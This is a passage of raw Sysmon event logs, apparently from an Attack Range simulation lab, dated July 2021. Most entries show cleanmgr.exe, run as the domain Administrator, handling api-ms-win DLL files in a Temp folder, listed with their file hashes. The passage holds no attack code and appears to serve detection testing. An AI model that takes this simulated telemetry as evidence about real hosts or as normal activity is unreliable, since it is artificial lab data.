07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-base-l1-1-0.dllMD5=DC4B661366FEAA4ED54FB1004D9E7A3D,SHA256=B4018F8F249CE087DB46F61A0C2E947248A5B71576F511F0B3650433607BC663,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-EventLog-Legacy-L1-1-0.dllMD5=B8B7B02C3C66638EC0BDF49BCF04A680,SHA256=5D1103E89199731DFFF7BF89D7F6484C038D47CC04F730CD5233EDE488272E6A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Provider-L1-1-0.dllMD5=FEAA05CE6CCB92AA7B2A2C58C049891A,SHA256=31A4AE262E179DF4CA406E1AF90F651935657BB5FD990C675C67E37D5B834CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Legacy-L1-1-0.dllMD5=88450242D5350529CC8E46FD9C3F3B7B,SHA256=312B6BFC89B551F2C4E8FEDAB316DBE01F190CD5E67091AAFB0E6F67616DC745,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Controller-L1-1-0.dllMD5=00A27A81EAAE90C9CED7063013877357,SHA256=DC4EE086FC046E1D7A291EA3B8B13E77B7A252B5C283B8F6C9CEC729070B7822,IMPHASH=00000000000000000000000000000000truetrue 354300x8000000000000000808582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:48.297{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57336-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:49.180{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D7B7EF36B178AC7C0E3BCFD4BDD4B16,SHA256=A1E0948DF18AB2583E4FDB6A59738315D7D501E0859E14B0B69ED7B1427F7408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-eventing-consumer-l1-1-0.dllMD5=61958A4BE8F944BAFB29DF8009541FCD,SHA256=3B7CB5622BEAC7D633A84EE2F7336C8DE1D3D1AA10577D98020081AB67761FAD,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dllMD5=8500E093D6B36DF1AF271F6EB34227CA,SHA256=99E2CD36104D3EFD4DEC88AD0F4BED1FD1BBFA97CC4FB29DB7F7136290DD6B70,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-1.dllMD5=5A03B636125C21AB918D2CB04843DBA8,SHA256=C914CD6FE6C7B16533763BC789EDAF67D7A19C26514C927572051C4379C79FC0,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-0.dllMD5=0C61A8D9CF9BBF6D771BEF0FF4A43E23,SHA256=66807B95E13944D52E9A7AA1F1A41E632FAA46F6B48F98451618DB3845622577,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-xstate-l2-1-0.dllMD5=56A386E38B637FCD96CED04CEFBCF8DE,SHA256=A5BE1E3C71A3A5C8EEF4BFAD9D0BADC97BA47B2B9911CED4BD1B8F65BB8DCB77,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-xstate-l1-1-0.dllMD5=6A982D13DDB295E59F90FF23EDD2E60F,SHA256=3617DBCADFE370463B4DBB91C1C6222923F16EC362DE29C2CA3AE4E72C9ABB64,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-wow64-l1-1-0.dllMD5=AE7573E1DC370B9A8FEBCC17A6C82FF8,SHA256=59A473D1AD7C181C89AF00B966CD107F1846CDC526009C4807A1EAE3DCB3731D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-version-l1-1-0.dllMD5=5CB34501C2D784D31281FD526B0BB963,SHA256=E45B73AF0C35F05B01CADF6BD4F67C1497586F4C4F9A16F0448BA751E16C4596,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-util-l1-1-0.dllMD5=212DA9E9AD6BB61A3554A4174BA558CF,SHA256=01291D3895EC5BB0E658F91FE1512AADCBB6D8F1154BC6023076554AFA05AC1D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-url-l1-1-0.dllMD5=198A08F8150D7575CC207CFFCF67D66C,SHA256=86F6DA0F1D075B7E1678DF71689948FEC334CFB10316FEB40E5107135548F9B4,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-timezone-l1-1-0.dllMD5=4D7C132D9742FFA44248B1BBF32020FB,SHA256=58A65C1938DCDF64D2930B037E9D133A5ACDF46365835782869D3216D3CF2CED,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-private-l1-1-0.dllMD5=A9BC53B62CD4B269B8385ADBE0AE808D,SHA256=A30003AB0C020E433CC5296E7E150BB11820395D439062FF7FD6D7F449C4C5B3,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-legacy-l1-1-0.dllMD5=CAC86F4298EB2D239410B3338780DC34,SHA256=1D99842180A612D63F1A8B137A9BF0375B7113AAB325916BA4781AB8A7B68E7D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.759{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-l1-2-0.dllMD5=D32DDF80AB3F1F96F431E5672DC1F387,SHA256=E2F0F0D46082ED40D042BCCD47F4E917707CF884672C5919116126914FAD4572,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-1.dllMD5=E83097DFE144367FA2231828F9FD89A6,SHA256=69FA978126192DBAB6AF11C9878D9C2BD1FD7E3FC899300244DFA4A1AC7ACA31,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-0.dllMD5=8D842EBFFA7803451A3AC7D6907A6AD9,SHA256=808C22A733B5F6A4E601605DCF4043C9952CEBE825FF2622097FC5B4FACF682A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-1-0.dllMD5=376E34D4A8F94C94FFF063810717612D,SHA256=5285A11016967E2017A8187882579CBD722371D0B7497B356149FC447160A521,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-2-0.dllMD5=E19F4FA6A6313F00ADE8AF26649A0BA1,SHA256=386F6CC0C3CE0C904A44A2FDDD11B2E5EA7782B08E69FD961DA5BE3C32BA5C26,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-1-0.dllMD5=95088E453B41A8B50E7340E6DE9CD09C,SHA256=E4938C16CA5FC7A8C9D87E4201FA2F28992026F5858F36A2A44EA22B5BD0889F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringloader-l1-1-1.dllMD5=FE1D00B19175DE6E9729F709C508DD6B,SHA256=D726F32AEB323F4DEA55D35441D1FF06BF3E212846A6B86D9ADC8F9DD1307B57,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringansi-l1-1-0.dllMD5=43F8D61E2EE0E253B973EFED0B3EBC8D,SHA256=1B9FA225A474D42FF8360141C8BC1EE1E7310958910931AC8E5A213E957700BD,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-obsolete-l1-1-0.dllMD5=92C0A4E592B5D773C562A36CBA4E6E47,SHA256=5191E82E921398310FE9FD333F5CA44E6233358499EDD5B33BF8E9F0C9D3B88E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-l2-1-0.dllMD5=3E1902AF98905F00E62B1EC827EB0FC2,SHA256=503443DBF6E6E481EA1C661109CE17B3D55C4FEA001D77F11CD032BDDF64FD29,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-string-l1-1-0.dllMD5=D30D4587D051D288D1023DB0D826295A,SHA256=DFE66C8C205C95274565BADB7B3C19043917F6CD07A8DE34CE241EFFF9EA6676,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shutdown-l1-1-0.dllMD5=1D8D1283F8279BDDACF8745AEDA3DB2A,SHA256=21BF3432160DD9851CAAC716DF3A41E39428A84BA9B9D3C63CDD300CB6928300,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-obsolete-l1-1-0.dllMD5=33BEFB60C3DC3E93FCE54A0515100181,SHA256=24B3FA4C5E8AB463BD2CFB704D7BFA7E8429726852EF582F94E44D7691BDD1FB,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-legacy-l1-1-0.dllMD5=699CDC66AA090D13EFF451F2006944CF,SHA256=6212B2B8CF5533F9DB6E366BBADED7A8D6EAD6667EA6A425B6987102669D8D96,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-rtlsupport-l1-1-0.dllMD5=F9672F68330CD16B0D1FA3A75B123AE8,SHA256=C5938839A3DFFBFBFEF432D0A95D0773375B4758FC160EDD04383A4B4273A18B,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l2-1-0.dllMD5=BBC015F33C0C3C2F9FC58C466BF8A30A,SHA256=1ED3511DC98353CA8E9B22A40C318BBD24484C25C171886B06B22AFD396ACFE8,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l1-1-0.dllMD5=D132FADCBF190A1C68070E6D488E67D7,SHA256=E6F51C07641EF931C4F97E5D966242BB96A156A603A7769BEAE0EA61E9E25486,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-realtime-l1-1-0.dllMD5=792C54B79CA333ABBB51BE66815A98CF,SHA256=1E3B3505560AB3E641C386473A83AA194D94CD5BC6CC4FA718D003D1FF899601,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-profile-l1-1-0.dllMD5=C4E53285E8C51DCBEFF5098215759D69,SHA256=320A6138FE915BE7E83F4CDC2024531948185C3BFC939CB367A53F1AA74BFB2C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processtopology-obsolete-l1-1-0.dllMD5=99E3ACC47F10000AE67A577F5893FD5A,SHA256=AD01524D3FDDC25C91292808E7B333B587C902E996E557885E79CC10F9A66214,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-2.dllMD5=DABFBC1EAB7AEE555F3BAEAF981EC7EB,SHA256=3070505B0B060D9EE9C2B699A518481A22DC15ECAF9603089FCF9EBC022179C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-1.dllMD5=8C5DF20B2E2DE6BA6717A597A951E4F7,SHA256=BE42C78E3F21CD6E74811F27E1B76C4FE8537FB149EF34EA455F22AAA29720ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-0.dllMD5=3D0CD1FE610E55E8C151162004A1429F,SHA256=D43535460D9CF2F2D348E9F2027DAF9FC0C0C906D5066E15F86332C839C94651,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-2-0.dllMD5=BB20192D0B22AD2EBBF4960B66D2E164,SHA256=23E758C4F7646AACC2DE8B8930BB272115F726F27E5437DF606E1C2328FA48F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-1-0.dllMD5=2CF62C9CF255C15AD1C8B1CCDD9453D6,SHA256=35CDE2048D4EC8D5D02B1CA57B81B8D5F579541EDBAF5DA4485A6323B8C3A805,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-1.dllMD5=FA8EFF9B35BE58F70CD0014DAF108819,SHA256=835F086B0884E8E1689D661657F258FA1E71439672E9F0CC0140D614DAB6FA6F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-0.dllMD5=C8490BC5ACB353CAF140CB12670883A2,SHA256=85F3FE5E802843596F466D479111658B08271E48CC1821EB17E6D299D523C95E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-namedpipe-l1-1-0.dllMD5=D8F1E545D80C2045881C7F0525558D80,SHA256=0D9C3D6A6DF364F812D370258C1B3D3F97584E9F7D36569D06746EBA1695D368,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-2.dllMD5=9F77AA276A31F36805DF003F9E66BD99,SHA256=26425008D97A2EA8B95AF52BFE47CF5DE1DE9BB3E25DF77123B85C895192D7D6,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.712{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-1.dllMD5=728A5655624D5B091E8E216BE90D9EF9,SHA256=A2B17F63065CC760FA9CF5D2950D0E13613997546C90CFA1C094CF32171D49ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 